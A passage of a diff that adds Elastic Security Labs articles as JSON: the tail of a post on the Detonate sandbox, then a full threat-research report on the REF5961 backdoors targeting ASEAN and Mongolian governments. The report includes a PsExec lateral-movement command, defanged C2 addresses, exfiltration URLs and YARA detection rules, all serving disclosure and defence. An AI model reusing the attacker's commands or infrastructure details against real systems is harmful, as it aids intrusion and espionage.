These logs allow us to see private network traffic initiated by sandbox VMs in our VPC.\n\n### Telemetry collection\n\nTo observe detonations, we use the [Elastic Agent](https://www.elastic.co/elastic-agent) with the [Elastic Defend](https://www.elastic.co/guide/en/security/current/install-endpoint.html) integration installed with all protections in “Detect” (instead of “Protect”) mode. This allows us to collect as much information from a VM as we can, while simultaneously allowing the [Elastic Security](https://www.elastic.co/security) solution to produce alerts and detections.\n\n\n\nWe cover two use cases with this architecture: we can validate protections (comparing events and alerts produced for different OS versions, agent versions, security artifacts deployed, etc.) and collect telemetry for analysis (for fresh samples or novel malware) at the same time. All data collected is kept in a persistent Elastic cluster and is available for our researchers.\n\n## Running in production\n\nRecently, we completed a full month of running the Detonate pipeline in production, under the load of multiple data integrations, serving internal users through the UI at the same time. Our record so far is 1034 detonations in a single day, and we haven’t seen any scalability or reliability issues.\n\n\n\nThe bulk of the submissions are Windows-specific samples, for now. We are working on increasing our coverage of Linux and macOS as well – stay tuned for the research blog posts coming soon!\n\n\n\nWe are constantly improving our support for various file types, making sure the detonation is as close to the intended trigger behavior as possible.\n\nLooking at the detonations from the last month, we see that most of the tasks were completed in under 13 minutes (with a median of 515 seconds). 
This time includes task data preparation, VM provisioning and cleanup, sample execution, and post-detonation processing.\n\n\n\nThese are still the early days of the service, so it is normal to see outliers. Since most of the time in a task is spent waiting for a VM to provision, we can improve the overall execution time by using custom VM images, pre-starting VM instances, and optimizing the startup scripts.\n\n## What's next?\n\nNow that you see how Detonate works, our next posts will dive into more detailed use cases of Detonate. We’ll go further into how these detonations turn into protections for more of our users, including right here at Elastic!\n"
+ },
+ "title": "Into The Weeds: How We Run Detonate",
+ "slug": "into-the-weeds-how-we-run-detonate",
+ "subtitle": "A deeper dive into the technical implementations of Detonate",
+ "date": "2023-06-13",
+ "description": "Explore the technical implementation of the Detonate system, including sandbox creation, the supporting technology, telemetry collection, and how to blow stuff up.",
+ "author": [
+ {
+ "slug": "jessica-david"
+ },
+ {
+ "slug": "sergey-polzunov"
+ },
+ {
+ "slug": "hez-carty"
+ }
+ ],
+ "image": "photo-edited-02@2x.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ },
+ {
+ "slug": "tools"
+ },
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "detonate"
+ ]
+ },
+ "id": "security_labs_content-into_the_weeds_how_we_run_detonate-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introducing_the_ref5961_intrusion_set-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introducing_the_ref5961_intrusion_set-md.json
new file mode 100644
index 00000000000..75dee88e75f
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-introducing_the_ref5961_intrusion_set-md.json
@@ -0,0 +1,48 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Introducing the REF5961 intrusion set\"\nslug: \"introducing-the-ref5961-intrusion-set\"\ndate: \"2023-10-04\"\ndescription: \"The REF5961 intrusion set discloses three new malware families targeting ASEAN members. The threat actor leveraging this intrusion set continues to develop and mature their capabilities.\"\nauthor:\n - slug: daniel-stepanic\n - slug: salim-bitam\n - slug: cyril-francois\n - slug: seth-goodwin\n - slug: andrew-pease\nimage: \"photo-edited-08@2x.jpg\"\ncategory:\n - slug: security-research\n - slug: malware-analysis\ntags:\n - security-research\n - malware-analysis\n - ref5961\n - ref2924\n - eagerbee\n - downtown\n - rudebird\n---\n\n## Preamble\n\n**Updated October 11, 2023 to include links to the BLOODALCHEMY backdoor.**\n\nElastic Security Labs continues to monitor state-aligned activity, targeting governments and multinational government organizations in Southern and Southeastern Asia. We’ve observed a batch of new and unique capabilities within a complex government environment. This intrusion set is named REF5961.\n\nIn this publication, we will highlight distinctions between malware families, demonstrate relationships to known threats, describe their features, and share resources to identify or mitigate elements of an intrusion. Our intent is to help expose this ongoing activity so the community can better understand these types of threats.\n\nThe samples in this research were discovered to be co-residents with a previously reported intrusion set, REF2924 (original reporting [here](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) and updated [here](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns)). The victim is the Foreign Affairs Ministry of a member of the Association of Southeast Asian Nations (ASEAN). 
\n\nElastic Security Labs describes the operators of the REF2924 and REF5961 intrusion sets as state-sponsored and espionage-motivated due to observed targeting and post-exploitation collection activity. Further, the correlation of execution flows, tooling, infrastructure, and victimology of multiple campaigns we’re tracking along with numerous third-party reports makes us confident this is a China-nexus actor.\n\n\n\n\nPart of this intrusion set includes a new x86-based backdoor called BLOODALCHEMY, and it is covered in depth [here](https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor).\n\n## Key takeaways\n\n* Elastic Security Labs is disclosing three new malware families:\n * EAGERBEE\n * RUDEBIRD\n * DOWNTOWN\n* Code sharing and network infrastructure have connected malware in this intrusion set to other campaigns\n* The threat actors targeting ASEAN governments and organizations continue to develop and deploy additional capabilities\n\n## EAGERBEE\n\nEAGERBEE is a newly identified backdoor discovered by Elastic Security Labs that loads additional capabilities using remotely-downloaded PE files, hosted in C2. However, its implementation and coding practices reveal a lack of advanced skills from the author, relying on basic techniques.\n\nDuring our research outlined below, we identified string formatting and underlying behavior that aligns with previous research attributed to a Chinese-speaking threat actor referred to as [LuckyMouse](https://malpedia.caad.fkie.fraunhofer.de/actor/apt27) (APT27, EmissaryPanda).\n\n### Code analysis\n\nEAGERBEE dynamically constructs its Import Address Table (IAT) during runtime, populating a designated data structure with the memory addresses of essential Windows APIs that the malware needs.\n\n\n\n\n**_Note: Dynamic import tables are used as an anti-analysis technique by malware authors to impair static analysis of their binaries. 
These techniques prevent most static analysis software from determining the imports and thus force analysts through laborious manual methods to determine what the malware is doing._**\n\nAfter resolving all the required Windows APIs, the malware creates a mutex with the string `mstoolFtip32W` to prevent multiple instances of the malware from running on the same machine.\n\n\n\n\nThe malware gathers key information about the compromised system:\n* The computer's name is obtained using the `GetComputerNameW` function\n* The malware retrieves the Windows version by utilizing the `GetVersionExW` function\n* A globally unique identifier (GUID) is generated through the `CoCreateGuid` function\n* The processor architecture information is acquired using the `GetNativeSystemInfo` function\n* The ProductName, EditionID, and CurrentBuildNumber are extracted from the designated registry key `SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion`\n\n\n\n\nThe sample’s operational schedule is controlled by the string `0-5:00:23;6:00:23;`. In our sample the malware conforms to the outlined schedule using the ISO 8601 24-hour timekeeping system: \n* active from Sunday(0) to Friday(5)\n* all hours between 00 and 23\n* Saturday(6) all hours between 00 and 23\n\nThis functionality allows the malware to impose self-restrictions during specific timeframes, showcasing both its adaptability and control.\n\n\n\n\nThe malware's C2 addresses are either hardcoded values or stored in an XOR-encrypted file named `c:\\users\\public\\iconcache.mui`. This file is decrypted using the first character as the decryption key.\n\nThis configuration file contains a list of semicolon-delimited IP addresses. The format adheres to the structure `IP:PORT`, where the character `s` is optional and instructs the malware to open a Secure Socket Layer (SSL) for encrypted communication between C2 and the malware.\n\n\n\nThe configuration optionally accepts a list of port numbers on which the malware will listen. 
The specific configuration mode, whether it's for reverse or forward connections, determines this behavior.\n\nA configuration flag is embedded directly into the code in both operating modes. This flag empowers the malware to select between utilizing SSL encryption during its interactions with the C2 server or plain text communication.\n\nIn passive listening mode, the malware opens a listening socket on the port indicated in its configuration.\n\nWhen operating in active connection mode, the malware attempts to load its configuration from the file `c:\\users\\public\\iconcache.mui`. In the event that this file is not found, the malware falls back to its hardcoded configuration to acquire the necessary IPs.\n\nThe author employs a global variable embedded in the source code to select between modes. Importantly, both are included in the binary, with only one being executed based on the selection. Leaving this dormant capability in the binary may have been a mistake, but one that helps researchers understand the technical maturity of this group. Generally speaking, malware authors benefit from removing unused code that may be used against them.\n\n\n\n\n**_Note: In C programming, modularity is achieved through the use of #define directives to selectively include or exclude code parts in the compiled binary. However, the malware developer employed a less advisable approach in this case. They utilized static global variables whose values are set during compilation. Consequently, the resulting binary contains both utilized and unused functions. During runtime, the binary assesses the value of these static global variables to determine its behavior. 
Though functional, this is neither the best programming nor tradecraft practice as it permits analysis and detection engineering of code used outside the identified intrusion._**\n\nThe malware has the capability to detect the presence of an HTTP proxy configuration on the host machine by inspecting the `ProxyEnable` registry key within `Software\\Microsoft\\windows\\CurrentVersion\\Internet Settings`. If this key value is set to `1`, the malware extracts the information in the `ProxyServer` key. \n\nIf no proxy server is set, the malware connects directly to C2. \n\nHowever, if the proxy settings are defined, the malware also initializes the proxy by sending a `CONNECT` request and its data to the configured destination. The malware author made a typo in the HTTP request code; they mistakenly wrote `DONNECT` instead of `CONNECT` in the HTTP request string in the binary. This is a reliably unique indicator for those analyzing network captures.\n\t\n\n\n\nUpon establishing a connection to C2, the malware downloads executable files from C2, likely pushed automatically. It validates that each executable is 64-bit, then extracts the entry point and modifies memory protections to allow execution using the VirtualProtect API.\n\n\n\n\n### EAGERBEE connection to a Mongolian campaign\n\nDuring our EAGERBEE analysis, we also saw an additional two (previously unnamed) EAGERBEE [samples](https://www.virustotal.com/gui/search/09005775FC587AC7BF150C05352E59DC01008B7BF8C1D870D1CEA87561AA0B06%250AA191D8059E93C0AB479DE45CDD91C41B985F9BCCD7B2CAD9F171FEA1C5F19E2E/files) involved in a targeted campaign focused on Mongolia. These two EAGERBEE samples were each bundled with other files and used a similar naming convention (`iconcache.mui` for EAGERBEE and `iconcaches.mui` in the Mongolian campaign). 
The samples consisted of multiple files and a lure document.\n\n\n\n\nWhile analyzing the Mongolian campaign samples, we found a previous [webpage](https://www.virustotal.com/gui/url/7e0d899d54c6a0f43fbac0e633d821eefa9057e29df8c4956321fe947daaaa54) (`http://president[.]mn/en/ebooksheets.php`) hosted under Mongolian infrastructure serving a [RAR file](https://www.virustotal.com/gui/file/af8cb76d9d955d654ec89b85d1ab35e1886ec2ba1a8c600a451d1bd383fb4e66/detection) named `20220921_2.rar`. Given the VirusTotal scan date of the file and the filename, it is likely to have been created in September 2022.\n\nThe lure text is centered around the regulations for the “Billion Trees National Movement Fund” and has been an important [topic](https://thediplomat.com/2022/06/mongolias-1-billion-tree-movement/) in recent years related to an initiative taken on by Mongolia. To address food security, climate impacts, and naturally occurring but accelerating desertification, Mongolia’s government has undertaken an ambitious goal of planting one billion trees throughout the country.\n\n\n\n\nFor this infection chain, they leveraged a signed Kaspersky application in order to sideload a [malicious DLL](https://www.virustotal.com/gui/file/4b3dc8609cba089e666b2086264e6f71dada57fdb3f160d2f5e546881a278766/relations). Upon execution, sensitive data and files were collected from the machine and uploaded to a hard-coded Mongolian government URL (`www.president[.]mn/upload.php`) via cURL. Persistence is configured using a Registry Run Key.\n\n\n\n\n**_Note: Though it does not contain the .gov second-level domain, www.president[.]mn does appear to be the official domain of the President of Mongolia, and is hosted within government infrastructure. 
Abuse email is directed to oyunbold@datacenter.gov[.]mn which appears to be legitimate._** Based on string formatting and underlying behavior, this sample aligns with public [reporting](https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/) from AVAST related to a utility they call DataExtractor1.\n\n\n\n\nWhile we didn’t find a WinRAR archive for the other linked sample, we found this related [executable](https://www.virustotal.com/gui/file/a191d8059e93c0ab479de45cdd91c41b985f9bccd7b2cad9f171fea1c5f19e2e). It functions similarly, using a different callback domain hosted on Mongolian infrastructure (`https://intranet.gov[.]mn/upload.php`).\n\n\n\n\nWhile it is not clear how this infrastructure was compromised or the extent to which it has been used, impersonating trusted systems may have enabled the threat to compromise other victims and collect intelligence.\n\n### EAGERBEE Summary\n\nEAGERBEE is a technically straightforward backdoor with forward and reverse C2 and SSL encryption capabilities, used to conduct basic system enumeration and deliver subsequent executables for post-exploitation. The C2 mode is defined at compile time, and configurable with an associated config file with hardcoded fallback.\n\nUsing code overlap analysis, and the fact that EAGERBEE was bundled with other samples from VirusTotal, we identified a C2 server hosted on Mongolian government infrastructure. The associated lure documents also reference Mongolian government policy initiatives. This leads us to believe that the Mongolian government or non-governmental organizations (NGOs) may have been targeted by the REF2924 threat actor.\n\n## RUDEBIRD\n\nWithin the contested REF2924 environment, Elastic Security Labs identified a lightweight Windows backdoor that communicates over HTTPS and contains capabilities to perform reconnaissance and execute code. 
We refer to this malware family as RUDEBIRD.\n\n### Initial execution\n\nThe backdoor was executed by a file with an invalid signature, `C:\\Windows\\help\\RVTDM.exe`, which resembles the Sysinternals screen magnifier utility ZoomIt. Shortly after being executed, Elastic Defend registered a process injection alert. \n\n\n\n\nThe process was executed with the parent process (`w3wp.exe`) coming from a Microsoft Exchange application pool. This is consistent with the exploitation of an unpatched Exchange vulnerability, and prior research supports that hypothesis.\n\n### Lateral movement\n\nRUDEBIRD used PsExec (`exec.exe`) to execute itself from the SYSTEM account and then move laterally from victim 0 to another targeted host. It is unclear if PsExec was brought to the environment by the threat actor or if it was already present in the environment. \n\n`\"C:\\windows\\help\\exec.exe\" /accepteula \\\\{victim-1} -d -s C:\\windows\\debug\\RVTDM.EXE`\n\n### Code analysis\n\nRUDEBIRD is composed of shellcode that resolves imports dynamically by accessing the Thread Environment Block (TEB) / Process Environment Block (PEB) and walking the loaded modules to find base addresses for the `kernel32.dll` and `ntdll.dll` modules. These system DLLs contain crucial functions that will be located by the malware in order to interact with the Windows operating system.\n\n\n\n\nRUDEBIRD uses a straightforward API hashing algorithm with multiplication (`0x21`) and addition that is [publicly available](https://github.com/OALabs/hashdb/blob/main/algorithms/mult21_add.py) from OALabs. 
This provides defense against static-analysis tools that analysts may use to inspect the import table and discern what capabilities a binary has.\n\n\n\n\nAfter resolving the libraries, there is an initial enumeration function that collects several pieces of information including:\n* Hostname\n* Computer name\n* Username\n* IP Address\n* System architecture\n* Privilege of the current user\n\nFor some functions that return larger amounts of data, the malware implements compression using `RtlCompressBuffer`. The malware communicates using HTTPS to IP addresses loaded in memory from its configuration. We observed two IP addresses in the configuration in our sample:\n\n* `45.90.58[.]103`\n* `185.195.237[.]123`\n\nStrangely, there are several functions throughout the program that include calls to `OutputDebugStringA`. This function is typically used during the development phase and serves as a mechanism to send strings to a debugger while testing a program. Normally, these debug messages are expected to be removed after development is finished. For example, the result of the administrator check is printed if run inside a debugger.\n\n\n\n\nRUDEBIRD uses mutexes to maintain synchronization throughout its execution. On launch, the mutex is set to `VV.0`.\n\n\n\n\nAfter the initial enumeration stage, RUDEBIRD operates as a traditional backdoor with the following capabilities:\n* Retrieve victim’s desktop directory path\n* Retrieve disk volume information \n* Perform file/directory enumeration\n* Perform file operations such as reading/writing file content\n* Launch new processes\n* File/folder operations such as creating new directories, move/copy/delete/rename files\n* Beacon timeout option\n\n## DOWNTOWN (SManager/PhantomNet)\n\nIn the REF2924 environment, we observed a modular implant we call DOWNTOWN. 
This sample shares a plugin architecture and code similarities with the publicly reported malware [SManager/PhantomNet](https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager), and aligns with the victimology described for that family. While we have little visibility into the impacts of its overall use, we wanted to share any details that may help the community. \n\nSManager/PhantomNet has been attributed to [TA428](https://malpedia.caad.fkie.fraunhofer.de/actor/ta428) (Colourful Panda, BRONZE DUDLEY), a threat actor likely sponsored by the Chinese government. Because of the shared plugin architecture, code similarities, and victimology, we are attributing DOWNTOWN with a moderate degree of confidence to a nationally sponsored Chinese threat actor.\n\n### Code analysis\n\nFor DOWNTOWN, we collected the plugin from a larger framework. This distinction is made based on unique and shared exports from previously published [research](https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/) by ESET. One of the exports contains the same misspelling previously identified in the ESET blog, `GetPluginInfomation` (note: `Infomation` is missing an `r`). The victimology of REF2924 is consistent with their reported victim vertical and region.\n\n\n\n\nIn our sample, the plugin is labeled as “ExplorerManager”. \n\n\n\n\nThe majority of the code appears to be centered around middleware functionality (linked lists, memory management, and thread synchronization) used to task the malware. \n\n\n\n\nIn a similar fashion to RUDEBIRD above, DOWNTOWN also included debug functionality using `OutputDebugStringA`. Again, debugging frameworks are usually removed once the software is moved from development to production status. 
This could indicate that this module is still in active development or a lack of operational scrutiny by the malware author(s).\n\n\n\n\nSome functionality observed in the sample included:\n* File/folder enumeration\n* Disk enumeration\n* File operations (delete/execute/rename/copy)\n\nUnfortunately, our team did not encounter any network/communication functionality or find any domain or IP addresses tied to this sample. \n\n### DOWNTOWN Summary\n\nDOWNTOWN is part of a modular framework that shows probable ties to an established threat group. The observed plugin appears to provide middleware functionality to the main implant and contains several functions to perform enumeration.\n\n## Network infrastructure intersection\n\nWhen performing an analysis of the network infrastructure for EAGERBEE and RUDEBIRD, we identified similarities in the domain hosting provider, subdomain naming, registration dates, and service enablement between the two malware families’ C2 infrastructure. Additionally, we were able to use TLS leaf certificate fingerprints to establish another connection between EAGERBEE and the Mongolian campaign infrastructure.\n\n### Shared network infrastructure\n\nAs identified in the malware analysis section for EAGERBEE, there were two IP addresses used for C2: `185.82.217[.]164` and `195.123.245[.]79`.\n\nOf the two, `185.82.217[.]164` had an expired TLS certificate registered to it for `paper.hosted-by-bay[.]net`. 
The subdomain registration for `paper.hosted-by-bay[.]net` and the TLS certificate were registered on December 14, 2020.\n\n![paper.hosted-by-bay[.]net TLS certificate](/assets/images/introducing-the-ref5961-intrusion-set/image17.jpg)\n\n\nAs identified in the malware analysis section for RUDEBIRD, there were two IP addresses used for C2: `45.90.58[.]103` and `185.195.237[.]123`.\n\n`45.90.58[.]103` was used to register the subdomain `news.hosted-by-bay[.]net`, on December 13, 2020.\n\nBoth IP addresses (one from EAGERBEE and one from RUDEBIRD) were assigned to subdomains (`paper.hosted-by-bay[.]net` and `news.hosted-by-bay[.]net`) within one day at the domain `hosted-by-bay[.]net`.\n\n**_Note: While `195.123.245[.]79` (EAGERBEE) and `185.195.237[.]123` (RUDEBIRD) are malicious, we were unable to identify anything atypical of normal C2 nodes. They used the same defense evasion technique (described below) used by `185.82.217[.]164` (EAGERBEE) and `45.90.58[.]103` (RUDEBIRD)._**\n\n### Domain analysis\n\nWhen performing an analysis of the `hosted-by-bay[.]net` domain, we see that it is registered to the IP address `45.133.194[.]106`. This IP address exposes two TCP ports, one is the expected TLS port of `443`, and the other is `62753`.\n\n**_Note: Port `443` has a Let’s Encrypt TLS certificate for `paypal.goodspaypal[.]com`. This domain does not appear to be related to this research but should be categorized as malicious based on its registration to this IP._**\n\nOn port `62753`, there was a self-signed wildcard TLS leaf certificate with a fingerprint of `d218680140ad2c6e947bf16020c0d36d3216f6fc7370c366ebe841c02d889a59` (`*.REDACTED[.]mn`). This fingerprint is used for one host, `shop.REDACTED[.]mn`. The 10-year TLS certificate was registered on December 13, 2020.\n\n```\nValidity\nNot Before: 2020-12-13 11:53:20\nNot After: 2030-12-11 11:53:20\nSubject: CN=shop.REDACTED[.]mn\n```\n\n`.mn` is the Internet ccTLD for Mongolia and REDACTED is a large bank in Mongolia. 
When researching the network infrastructure for REDACTED, we can see that they do currently own their DNS infrastructure.\n\nIt does not appear that `shop.REDACTED[.]mn` was ever registered. This self-signed TLS certificate was likely used to encrypt C2 traffic. While we cannot confirm that this certificate was used for EAGERBEE or RUDEBIRD, in the malware code analysis of both EAGERBEE and RUDEBIRD, we identified that TLS to an IP address is an available malware configuration option. We do believe that this domain is related to EAGERBEE and RUDEBIRD based on the registration dates, IP addresses, and subdomains of the `hosted-by-bay[.]net` domain.\n\nAs noted in the EAGERBEE malware analysis, we identified two other previously unnamed EAGERBEE samples used to target Mongolian victims and also leveraged Mongolian C2 infrastructure.\n\n### Defense evasion\n\nFinally, we see all of the C2 IP addresses add and remove services at similar dates and times. This is a tactic to hinder the analysis of the C2 infrastructure by limiting its availability. It should be noted that the history of the service enablement and disablement (provided by [Censys.io](https://search.censys.io/) databases) is meant to show possible coordination in C2 availability. 
The images below show the last service change windows; further historical data was not available.\n\n`195.123.245[.]79` had TCP port `80` enabled on September 22, 2023 at 07:31 and then disabled on September 24, 2023 at 07:42.\n\n![195.123.245[.]79 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image6.jpg)\n\n\n`185.195.237[.]123` had TCP port `443` enabled on September 22, 2023 at 03:33 and then disabled on September 25, 2023 at 08:08.\n\n![185.195.237[.]123 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image23.jpg)\n\n\n`185.82.217[.]164` had TCP port `443` enabled on September 22, 2023 at 08:49 and then disabled on September 25, 2023 at 01:02.\n\n![185.82.217[.]164 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image20.jpg)\n\n\n`45.90.58[.]103` had TCP port `443` enabled on September 22, 2023 at 04:46 and then disabled on September 24, 2023 at 09:57.\n\n![45.90.58[.]103 C2 service windows](/assets/images/introducing-the-ref5961-intrusion-set/image10.jpg)\n\n\n### Network intersection summary\n\nEAGERBEE and RUDEBIRD are two malware samples, co-resident on the same infected endpoint, in the same environment. This alone builds a strong association between the families. 
\n\nAdding the fact that both families use C2 endpoints that have been used to register subdomains on the same domain (`hosted-by-bay[.]net`), together with the service availability coordination, leads us to say with a high degree of confidence that the malware and campaign operators are from the same tasking authority, or organizational umbrella.\n\n## Summary\n\nEAGERBEE, RUDEBIRD, and DOWNTOWN backdoors all exhibit characteristics of incompleteness, whether using “Test” in file/service names, ignoring compilation best practices, leaving orphaned code, or leaving a smattering of extraneous debug statements.\n\nThey all, however, deliver similar tactical capabilities in the context of this environment.\n* Local enumeration\n* Persistence\n* Download/execute additional tooling\n* C2 options\n\nThe variety of tooling performing the same or similar tasks with varying degrees and types of miscues causes us to speculate that this environment has attracted the interest of multiple players in the REF2924 threat actor’s organization. The victim's status as a government diplomatic agency would make it an ideal candidate as a stepping-off point to other targets within and outside the agency’s national borders. Additionally, it is easy to imagine that multiple entities within a national intelligence apparatus would have collection requirements that could be satisfied by this victim directly. \n\nThis environment has already seen the emergence of the REF2924 intrusion set (SIESTAGRAPH, NAPLISTENER, SOMNIRECORD, and DOORME), as well as the deployment of SHADOWPAD and COBALTSTRIKE. 
The REF2924 and REF5961 threat actor(s) continue to deploy new malware into their government victim’s environment.\n\n## REF5961 and MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n* EAGERBEE\n * [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n * [Discovery](https://attack.mitre.org/tactics/TA0007/)\n * [Command and Control](https://attack.mitre.org/tactics/TA0011/)\n * [Execution](https://attack.mitre.org/tactics/TA0002/)\n* RUDEBIRD\n * [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n * [Collection](https://attack.mitre.org/tactics/TA0009/)\n * [Command and Control](https://attack.mitre.org/tactics/TA0011/)\n * [Discovery](https://attack.mitre.org/tactics/TA0007/)\n * [Lateral Movement](https://attack.mitre.org/tactics/TA0008/)\n * [Execution](https://attack.mitre.org/tactics/TA0002/)\n* DOWNTOWN\n * [Discovery](https://attack.mitre.org/tactics/TA0007/)\n * [Collection](https://attack.mitre.org/tactics/TA0009/)\n\n### Techniques\n\nTechniques represent how an adversary achieves a tactical goal by performing an action.\n* EAGERBEE\n * [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)\n * [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n * [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)\n * [Proxy](https://attack.mitre.org/techniques/T1090/)\n * [Process Injection](https://attack.mitre.org/techniques/T1055/)\n* RUDEBIRD\n * [File and Directory Discovery](https://attack.mitre.org/tactics/TA0007/#:~:text=T1083-,File%20and%20Directory%20Discovery,-Adversaries%20may%20enumerate)\n * [System Information Discovery](https://attack.mitre.org/techniques/T1082)\n * 
[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)\n * [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570/)\n * [Data from Local System](https://attack.mitre.org/techniques/T1005)\n* DOWNTOWN\n * [File and Directory Discovery](https://attack.mitre.org/tactics/TA0007/#:~:text=T1083-,File%20and%20Directory%20Discovery,-Adversaries%20may%20enumerate)\n * [System Information Discovery](https://attack.mitre.org/techniques/T1082)\n\n## Malware prevention capabilities\n* [EAGERBEE](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_EagerBee.yar)\n* [RUDEBIRD](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_RudeBird.yar)\n* [DOWNTOWN](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_DownTown.yar)\n\n## YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the EAGERBEE, RUDEBIRD, and DOWNTOWN malware:\n\n### EAGERBEE\n```\nrule Windows_Trojan_EagerBee_1 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-05-09\"\n last_modified = \"2023-06-13\"\n threat_name = \"Windows.Trojan.EagerBee\"\n reference_sample = \"09005775fc587ac7bf150c05352e59dc01008b7bf8c1d870d1cea87561aa0b06\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $a1 = { C2 EB D6 0F B7 C2 48 8D 0C 80 41 8B 44 CB 14 41 2B 44 CB 0C 41 }\n $a2 = { C8 75 04 33 C0 EB 7C 48 63 41 3C 8B 94 08 88 00 00 00 48 03 D1 8B }\n\n condition:\n all of them\n}\n\nrule Windows_Trojan_EagerBee_2 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-09-04\"\n last_modified = \"2023-09-20\"\n threat_name = \"Windows.Trojan.EagerBee\"\n reference_sample = \"339e4fdbccb65b0b06a1421c719300a8da844789a2016d58e8ce4227cb5dc91b\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $dexor_config_file = { 48 FF C0 8D 51 FF 44 30 00 49 03 C4 49 2B D4 ?? ?? 
48 8D 4F 01 48 }\n $parse_config = { 80 7C 14 20 3A ?? ?? ?? ?? ?? ?? 45 03 C4 49 03 D4 49 63 C0 48 3B C1 }\n $parse_proxy1 = { 44 88 7C 24 31 44 88 7C 24 32 48 F7 D1 C6 44 24 33 70 C6 44 24 34 3D 88 5C 24 35 48 83 F9 01 }\n $parse_proxy2 = { 33 C0 48 8D BC 24 F0 00 00 00 49 8B CE F2 AE 8B D3 48 F7 D1 48 83 E9 01 48 8B F9 }\n\n condition:\n 2 of them\n}\n```\n\n### RUDEBIRD\n```\nrule Windows_Trojan_RudeBird {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-05-09\"\n last_modified = \"2023-06-13\"\n threat_name = \"Windows.Trojan.RudeBird\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $a1 = { 40 53 48 83 EC 20 48 8B D9 B9 D8 00 00 00 E8 FD C1 FF FF 48 8B C8 33 C0 48 85 C9 74 05 E8 3A F2 }\n\n condition:\n all of them\n}\n```\n\n### DOWNTOWN\n```\nrule Windows_Trojan_DownTown_1 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-05-10\"\n last_modified = \"2023-06-13\"\n threat_name = \"Windows.Trojan.DownTown\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $a1 = \"SendFileBuffer error -1 !!!\" fullword\n $a2 = \"ScheduledDownloadTasks CODE_FILE_VIEW \" fullword\n $a3 = \"ExplorerManagerC.dll\" fullword\n\n condition:\n 3 of them\n}\n\nrule Windows_Trojan_DownTown_2 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-08-23\"\n last_modified = \"2023-09-20\"\n threat_name = \"Windows.Trojan.DownTown\"\n license = \"Elastic License v2\"\n os = \"windows\"\n\n strings:\n $a1 = \"DeletePluginObject\"\n $a2 = \"GetPluginInfomation\"\n $a3 = \"GetPluginObject\"\n $a4 = \"GetRegisterCode\"\n\n condition:\n all of them\n}\n```\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ref5961) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference 
|\n|------------------------------------------------------------------|---------|--------------------|----------------|\n| `ce4dfda471f2d3fa4e000f9e3839c3d9fbf2d93ea7f89101161ce97faceadf9a` | SHA-256 | EAGERBEE shellcode | iconcaches.mui |\n| `29c90ac124b898b2ff2a4897921d5f5cc251396e8176fc8d6fa475df89d9274d` | SHA-256 | DOWNTOWN | In-memory DLL |\n| `185.82.217[.]164` | ipv4 | EAGERBEE C2 | |\n| `195.123.245[.]79` | ipv4 | EAGERBEE C2 | |\n| `45.90.58[.]103` | ipv4 | RUDEBIRD C2 | |\n| `185.195.237[.]123` | ipv4 | RUDEBIRD C2 | |\n\n## References\n\nThe following were referenced throughout the above research:\n* [https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) \n* [https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns) \n* [https://thediplomat.com/2022/06/mongolias-1-billion-tree-movement/](https://thediplomat.com/2022/06/mongolias-1-billion-tree-movement/) \n* [https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/](https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/) \n* [https://github.com/OALabs/hashdb/blob/main/algorithms/mult21_add.py](https://github.com/OALabs/hashdb/blob/main/algorithms/mult21_add.py) \n* [https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager](https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager)\n* 